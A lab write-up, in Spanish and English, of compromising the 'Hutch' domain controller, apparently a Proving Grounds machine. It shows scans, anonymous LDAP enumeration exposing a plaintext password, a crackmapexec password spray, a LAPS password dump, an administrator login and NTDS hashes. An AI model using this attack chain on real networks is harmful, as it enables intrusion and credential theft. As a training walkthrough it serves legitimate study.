Hutch
Description
Esta maquina fue comprometida auditando LDAP, primero pude extraer los usuarios y despues la contraseƱa rotada con LAPS
Enumeration
Nmap
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/10.0
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Sun, 12 Jun 2022 18:49:10 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_ Server Type: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-12 18:48:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
http://192.168.164.122 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[192.168.164.122], Microsoft-IIS[10.0], Title[IIS Windows Server], X-Powered-By[ASP.NET]
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 04 Nov 2020 05:35:35 GMT
Accept-Ranges: bytes
ETag: "965c9516cb2d61:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Sun, 12 Jun 2022 19:29:31 GMT
Content-Length: 703
Nikto
- Nikto v2.1.6/2.1.5
- Nikto v2.1.6/2.1.5
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.164.122
+ Target Port: 80
+ GET Retrieved x-powered-by header: ASP.NET
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.164.122
+ Target Port: 80
+ GET Retrieved x-powered-by header: ASP.NET
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Retrieved x-aspnet-version header: 4.0.30319
+ OPTIONS Retrieved dav header: 1,2,3
+ OPTIONS Retrieved ms-author-via header: DAV
+ OPTIONS Uncommon header 'ms-author-via' found, with contents: DAV
+ OPTIONS Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: GET HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: GET HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-5647: GET HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: GET HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: GET HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-5647: GET HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OPTIONS WebDAV enabled (LOCK COPY PROPPATCH UNLOCK PROPFIND MKCOL listed as allowed)
User Own
Enumeramos LDAP
root@kali:~/PG/192.168.164.122# ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.164.122" "(objectclass=*)" > ldap.txt
ldap_initialize( ldap://192.168.164.122:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
users
root@kali:~/PG/192.168.164.122# cat ldap.txt |grep -i principalname
userPrincipalName: rplacidi@hutch.offsec
userPrincipalName: opatry@hutch.offsec
userPrincipalName: ltaunton@hutch.offsec
userPrincipalName: acostello@hutch.offsec
userPrincipalName: jsparwell@hutch.offsec
userPrincipalName: oknee@hutch.offsec
userPrincipalName: jmckendry@hutch.offsec
userPrincipalName: avictoria@hutch.offsec
userPrincipalName: jfrarey@hutch.offsec
userPrincipalName: eaburrow@hutch.offsec
userPrincipalName: cluddy@hutch.offsec
userPrincipalName: agitthouse@hutch.offsec
userPrincipalName: fmcsorley@hutch.offsec
Clear Password
root@kali:~/PG/192.168.164.122# cat ldap.txt |grep -i password
badPasswordTime: 0
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse
# Allowed RODC Password Replication Group, Users, hutch.offsec
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec
cn: Allowed RODC Password Replication Group
description: Members in this group can have their passwords replicated to all
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutc
name: Allowed RODC Password Replication Group
sAMAccountName: Allowed RODC Password Replication Group
# Denied RODC Password Replication Group, Users, hutch.offsec
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec
cn: Denied RODC Password Replication Group
description: Members in this group cannot have their passwords replicated to a
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch
name: Denied RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
badPasswordTime: 0
description: Password set to CrabSharkJellyfish192 at user's request. Please c
badPasswordTime: 132489437036308102
Spraying Password
root@kali:~/PG/192.168.164.122/xpl# crackmapexec smb hutch.offsec -u validusers.txt -p CrabSharkJellyfish192
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\rplacidi:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\opatry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\ltaunton:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\acostello:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\jsparwell:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\oknee:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\jmckendry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\avictoria:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\jfrarey:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\eaburrow:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\cluddy:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [-] hutch.offsec\agitthouse:CrabSharkJellyfish192 STATUS_LOGON_FAILURE
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
root@kali:~/PG/192.168.164.122/xpl# crackmapexec smb hutch.offsec -u fmcsorley -p CrabSharkJellyfish192
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
credentials
user: fmcsorley
pass: CrabSharkJellyfish192
Root Own
CrackMapExec LAPS DUMP
root@kali:~/PG/192.168.55.122# crackmapexec ldap hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -M laps
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP HUTCHDC.hutch.offsec 389 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
LAPS HUTCHDC.hutch.offsec 389 HUTCHDC [*] Getting LAPS Passwords
LAPS HUTCHDC.hutch.offsec 389 HUTCHDC Computer: HUTCHDC$ Password: V2%.#lQ+t72%Rx
root@kali:~/PG/192.168.55.122# crackmapexec ldap hutch.offsec -u Administrator -p 'V2%.#lQ+t72%Rx'
SMB HUTCHDC.hutch.offsec 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP HUTCHDC.hutch.offsec 389 HUTCHDC [+] hutch.offsec\Administrator:V2%.#lQ+t72%Rx (Pwn3d!)
Proof
*Evil-WinRM* PS C:\users\administrator\desktop> type proof.txt
bb0894567e7c965de6cca5c6838a8834
*Evil-WinRM* PS C:\users\administrator\desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::d140:9ec3:5c28:43fe%3
IPv4 Address. . . . . . . . . . . : 192.168.55.122
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.55.254
Extra
NTDS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b413de8b3f45e7b4312d5c47de9f3601:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3c37d961d2fbbc1eb9e4d09f145ad361:::
hutch.offsec\rplacidi:1103:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\opatry:1104:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\ltaunton:1105:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\acostello:1106:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jsparwell:1107:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\oknee:1108:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jmckendry:1109:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\avictoria:1110:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\jfrarey:1111:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\eaburrow:1112:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\cluddy:1113:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\agitthouse:1114:aad3b435b51404eeaad3b435b51404ee:c11f1141ab4c1e825a11f15836e6978f:::
hutch.offsec\fmcsorley:1115:aad3b435b51404eeaad3b435b51404ee:83bcf188adc71adef071303fae29c1c7:::
hutch.offsec\domainadmin:1116:aad3b435b51404eeaad3b435b51404ee:8730fa0d1014eb78c61e3957aa7b93d7:::
HUTCHDC$:1000:aad3b435b51404eeaad3b435b51404ee:f6d1345c737f09a31a9ab2af1f96d3ec:::